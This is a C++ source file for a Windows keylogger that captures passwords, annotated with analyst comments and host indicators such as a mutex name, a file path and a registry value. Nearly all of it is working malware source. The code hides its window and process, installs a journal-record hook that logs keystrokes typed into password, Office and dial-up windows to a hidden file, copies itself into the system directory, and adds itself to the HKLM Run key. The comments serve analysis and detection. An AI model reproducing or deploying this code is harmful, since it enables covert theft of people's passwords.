/*
 * GetPwd.cpp -- sample of a Windows password-capturing keystroke logger.
 *
 * What the visible code does, in order of execution (see WinMain):
 *   - takes the named mutex "GMKRunOnlyOne" so only one instance runs;
 *   - creates a window titled "Get Password" and keeps it hidden (SW_HIDE);
 *   - calls RegisterServiceProcess (resolved at run time from KERNEL32.DLL);
 *   - installs a WH_JOURNALRECORD hook whose callback appends one character
 *     per key-down to the hidden file C:\passdata.txt when IsPassWindow()
 *     returns TRUE;
 *   - copies its own image to <system directory>\GmkMon.exe and writes a
 *     value named "GmkMon" under
 *     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
 *
 * Artifacts an analyst or detection rule can key on, all taken from this
 * file: mutex "GMKRunOnlyOne", file C:\passdata.txt with the hidden
 * attribute, \GmkMon.exe in the system directory, Run value "GmkMon",
 * a journal-record hook owned by a process with no visible window.
 */

/* NOTE(review): the header name after #include was lost when this page was
 * extracted; the line is reproduced as it appears. */
#include
#define KeyPMask 0x80000000   /* bit tested on the (sign-extended) GetKeyState result: key is down */
#define SERVICE_PROC 1        /* mode passed to RegisterServiceProcess by WinMain */
#define UNSERVICE_PROC 0      /* not referenced in the code shown here */
#define RUN "\\GmkMon.exe"    /* file name appended to the system directory for the self-copy */

/* Scratch record used by GetKey(): raw GetKeyState() values for Shift,
 * Caps Lock and Num Lock, their decoded booleans, and the resulting char. */
typedef struct tagKEYDATA
{
    char kKey;
    SHORT kShift;
    SHORT kCaps;
    SHORT kNum;
    BOOL bShift;
    BOOL bCaps;
    BOOL bNum;
}KEYDATA, *LPKEYDATA;

HHOOK hHook = NULL;                                     /* handle of the installed journal hook, NULL when none */
DWORD (WINAPI *RegisterServiceProcess)(DWORD,DWORD);    /* filled in by HideProc() via GetProcAddress */
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ;
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam);

/*
 * HideProc
 *   Loads KERNEL32.DLL, looks up the export "RegisterServiceProcess" and
 *   calls it with the current process id and `mode`.
 * Returns:
 *   TRUE if the export was found and called, FALSE if the library or the
 *   export could not be resolved. The return value of the call itself is
 *   ignored.
 * Analysis note: RegisterServiceProcess is a Windows 9x-era export; where
 * the lookup fails this function returns FALSE and has no other effect.
 * The library handle is never released.
 */
BOOL WINAPI HideProc(int mode)
{
    HINSTANCE DLLInst=LoadLibrary("KERNEL32.DLL");
    if(DLLInst)
    {
        RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
            GetProcAddress(DLLInst,"RegisterServiceProcess");
        if(RegisterServiceProcess)
        {
            RegisterServiceProcess(GetCurrentProcessId(),mode);
            return TRUE;
        }
        else
            return FALSE;
    }
    else
        return FALSE;
}

/*
 * IsPassWindow
 *   Decides whether the current key-down should be recorded. Starts from
 *   GetActiveWindow(), follows GetParent() to the topmost ancestor, then
 *   tests that window's style bits and title.
 * Returns:
 *   TRUE when one of the tests below matches, FALSE otherwise (including
 *   when there is no active window).
 */
BOOL WINAPI IsPassWindow()
{
    HWND hWnd,curHwnd;
    TCHAR szTemp[MAX_PATH];
    DWORD dwsTyle;

    curHwnd=GetActiveWindow();
    if(curHwnd==NULL)
        return FALSE;
    /* climb to the window that has no parent */
    while(curHwnd!=NULL)
    {
        hWnd=curHwnd;
        curHwnd=GetParent(hWnd);
    }
    dwsTyle=GetWindowLong(hWnd,GWL_STYLE);
    if(dwsTyle & ES_PASSWORD) // ordinary password box (author's label)
        return TRUE;
    /* NOTE(review): szTemp has not been written at this point; it is only
     * filled by GetWindowText() further down, so the two string comparisons
     * below read an indeterminate buffer. */
    else if(!lstrcmp(szTemp,"EDTBX")) // Excel password (author's label)
        return TRUE;
    else if(!lstrcmp(szTemp,"RichEdit20W") && (dwsTyle & WS_SYSMENU)) // Word password (author's label)
        return TRUE;
    GetWindowText(hWnd, szTemp, sizeof(szTemp));
    /* compares the first 6 bytes of the window title with the literal */
    if(!strncmp(szTemp, "连接到", 6)) // dial-up networking dialog (author's label)
        return TRUE;
    return FALSE;
}

/*
 * GetKey
 *   Maps a virtual-key code to the character it would produce, using the
 *   Shift / Caps Lock / Num Lock state read with GetKeyState() at the time
 *   of the call.
 * Parameters:
 *   nKey - virtual-key code (the caller passes the low byte only).
 * Returns:
 *   The mapped character, or '*' for any key or modifier combination the
 *   table below does not cover.
 */
TCHAR WINAPI GetKey(int nKey)
{
    KEYDATA kd;
    kd.kShift=GetKeyState(VK_SHIFT);
    kd.kCaps=GetKeyState(0x14);   /* 0x14 is VK_CAPITAL */
    kd.kNum=GetKeyState(0x90);    /* 0x90 is VK_NUMLOCK */
    /* a pressed key gives a negative SHORT, which sign-extends so bit 31 is set */
    kd.bShift=(kd.kShift & KeyPMask)==KeyPMask;
    /* low bit of GetKeyState is the toggle state */
    kd.bCaps=(kd.kCaps & 1)==1;
    kd.bNum=(kd.kNum & 1)==1;
    if(nKey>=48 && nKey<=57) // top-row digits 0-9; shifted digits are reported as '*'
    {
        if(!kd.bShift)
            return (kd.kKey=nKey);
        else
            return '*';
    }
    else if(nKey>=65 && nKey<=90) // letter keys; case chosen from Shift and Caps Lock
    {
        if(!kd.bCaps)
        {
            if(kd.bShift)
                kd.kKey=nKey;
            else
                kd.kKey=nKey+32;
        }
        else if(kd.bShift)
            kd.kKey=nKey+32;
        else
            kd.kKey=nKey;
        return kd.kKey;
    }
    else if(nKey>=96 && nKey<=105) // numeric keypad 0-9, only with Num Lock on
    {
        if(kd.bNum)
            return (kd.kKey=(nKey-96+48));
        else
            return '*';
    }
    else if(nKey>=186 && nKey<=222) // other keys (punctuation)
    {
        switch(nKey)
        {
        case 186: if(!kd.bShift) kd.kKey=';'; else kd.kKey=':'; break;
        case 187: if(!kd.bShift) kd.kKey='='; else kd.kKey='+'; break;
        case 188: if(!kd.bShift) kd.kKey=','; else kd.kKey='<' ; break;
        case 189: if(!kd.bShift) kd.kKey='-'; else kd.kKey='_'; break;
        case 190: if(!kd.bShift) kd.kKey='.'; else kd.kKey='>'; break;
        case 191: if(!kd.bShift) kd.kKey='/'; else kd.kKey='?'; break;
        case 192: if(!kd.bShift) kd.kKey='`'; else kd.kKey='~' ; break;
        case 219: if(!kd.bShift) kd.kKey='['; else kd.kKey='{'; break;
        case 220: if(!kd.bShift) kd.kKey='\\'; else kd.kKey='|'; break;
        case 221: if(!kd.bShift) kd.kKey=']'; else kd.kKey='}'; break;
        case 222: if(!kd.bShift) kd.kKey='\\'; else kd.kKey='\\'; break;
        default: kd.kKey='n'; break;   /* 'n' is used as the "no mapping" marker */
        }
        if(kd.kKey!='n')
            return kd.kKey;
        else
            return '*';
    }
    else
        return '*';
}

/*
 * WritePassFile
 *   Appends one character to C:\passdata.txt. The file is opened (or
 *   created) with FILE_ATTRIBUTE_HIDDEN, the file pointer is moved to the
 *   end, and the character returned by GetKey() for the low byte of nKey
 *   is written.
 * Analysis note: the file is opened and closed once per recorded key, and
 * none of the API results are checked. The fixed path and hidden attribute
 * are usable as host indicators.
 */
void WINAPI WritePassFile(int nKey)
{
    HANDLE hFile;
    DWORD dwBytesWrite=1;
    TCHAR lpStr;
    hFile=CreateFile("C:\\passdata.txt",
        GENERIC_READ|GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        OPEN_ALWAYS,
        FILE_ATTRIBUTE_HIDDEN,
        NULL
        );
    SetFilePointer(hFile,0,NULL,FILE_END);
    lpStr=GetKey(LOBYTE(nKey));
    WriteFile(hFile,&lpStr,1,&dwBytesWrite,0);
    CloseHandle(hFile);
}

/*
 * InstallHook
 *   Installs the WH_JOURNALRECORD hook with JournalRecordProc as callback
 *   if no hook handle is stored yet. The result is kept in hHook and is
 *   not checked for failure.
 * Analysis note: hook installation by a process with no visible UI is a
 * common endpoint-monitoring signal.
 */
void WINAPI InstallHook(HINSTANCE hInstance)
{
    if(hHook==NULL)
        hHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalRecordProc,hInstance,0);
}

/*
 * UninstallHook
 *   Removes the hook if one is installed. hHook is not reset afterwards.
 */
void WINAPI UninstallHook()
{
    if(hHook!=NULL)
        UnhookWindowsHookEx(hHook);
}

/*
 * JournalRecordProc
 *   Hook callback. lParam is treated as an EVENTMSG; on WM_KEYDOWN the low
 *   byte of paramL is recorded through WritePassFile() when IsPassWindow()
 *   returns TRUE. nCode is not inspected before lParam is dereferenced.
 * Returns:
 *   The result of CallNextHookEx(), so the event continues down the chain.
 */
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam)
{
    EVENTMSG *pMess=(EVENTMSG *)lParam;
    POINT pt;
    switch(pMess->message)
    {
    case WM_KEYDOWN:
        if(IsPassWindow())
            WritePassFile(LOBYTE(pMess->paramL));
        break;
    case WM_LBUTTONDBLCLK:
        /* cursor position is read but not used in the code shown */
        GetCursorPos(&pt);
        break;
    }
    return CallNextHookEx(hHook,nCode,wParam,lParam);
}

/*
 * WinMain
 *   Program entry point: single-instance check, hidden window, call to
 *   HideProc(), hook installation, self-copy to the system directory,
 *   Run-key registration, then the message loop.
 * Returns:
 *   msg.wParam from the message that ended the loop; exits with code 1 if
 *   the mutex already exists or cannot be created.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
                   PSTR szCmdLine, int iCmdShow)
{
    /* single-instance guard; the mutex name is a stable host indicator */
    HANDLE hMutex=CreateMutex(NULL,FALSE,"GMKRunOnlyOne");
    if(hMutex==NULL||ERROR_ALREADY_EXISTS==GetLastError())
        ExitProcess(1);

    static char szAppName[] = "Get Password" ;
    HWND hwnd ;
    MSG msg ;
    WNDCLASSEX wndclass ;
    HKEY hKey=0;
    DWORD disp=0;
    LONG lResult;
    TCHAR szKey[MAX_PATH];
    TCHAR szSysDir[MAX_PATH+25];
    TCHAR szFileName[MAX_PATH];

    wndclass.cbSize = sizeof (wndclass) ;
    wndclass.style = CS_HREDRAW | CS_VREDRAW ;
    wndclass.lpfnWndProc = WndProc ;
    wndclass.cbClsExtra = 0 ;
    wndclass.cbWndExtra = 0 ;
    wndclass.hInstance = hInstance ;
    wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION) ;
    wndclass.hCursor = LoadCursor (NULL, IDC_ARROW) ;
    wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH) ;
    wndclass.lpszMenuName = NULL ;
    wndclass.lpszClassName = szAppName ;
    wndclass.hIconSm = LoadIcon (NULL, IDI_APPLICATION) ;
    RegisterClassEx(&wndclass);

    hwnd=CreateWindow(
        szAppName,
        "Get Password",
        WS_OVERLAPPEDWINDOW,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        CW_USEDEFAULT,
        NULL,
        NULL,
        hInstance,
        NULL
        );
    /* the window exists only to own a message loop; it is never shown */
    ShowWindow(hwnd,SW_HIDE);
    UpdateWindow(hwnd);

    HideProc(SERVICE_PROC);
    InstallHook(hInstance);

    /* build "<system directory>\GmkMon.exe" and copy the running image
     * there, overwriting any existing file (third argument FALSE) */
    GetSystemDirectory(szSysDir,MAX_PATH);
    lstrcat(szSysDir,RUN);
    GetModuleFileName(NULL,szFileName,MAX_PATH);
    CopyFile(szFileName,szSysDir,FALSE);

    /* autostart registration: value "GmkMon" under the HKLM Run key holds
     * the path of the copy; writes to this key are a standard item to
     * monitor and to check during triage */
    lstrcpy(szKey,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
    lResult=RegCreateKeyEx(
        HKEY_LOCAL_MACHINE,
        szKey,
        0,
        NULL,
        REG_OPTION_VOLATILE,
        KEY_ALL_ACCESS,
        NULL,
        &hKey,
        &disp
        );
    if(lResult==ERROR_SUCCESS)
    {
        lResult=RegSetValueEx(hKey,"GmkMon",0,REG_SZ,(const unsigned char*)szSysDir,lstrlen(szSysDir));
        RegCloseKey(hKey);
    }

    while (GetMessage (&msg, NULL, 0, 0))
    {
        TranslateMessage (&msg) ;
        DispatchMessage (&msg) ;
    }
    return msg.wParam ;
}

/*
 * WndProc
 *   Window procedure of the hidden window. WM_PAINT is swallowed; on
 *   WM_DESTROY the hook is removed and the message loop is told to quit.
 *   Everything else goes to DefWindowProc().
 */
LRESULT CALLBACK WndProc (HWND hwnd, UINT iMsg, WPARAM wParam, LPARAM lParam)
{
    switch (iMsg)
    {
    case WM_PAINT:
        return 0 ;
    case WM_DESTROY:
        UninstallHook();
        PostQuitMessage (0) ;
        return 0 ;
    }
    return DefWindowProc(hwnd,iMsg,wParam,lParam);
}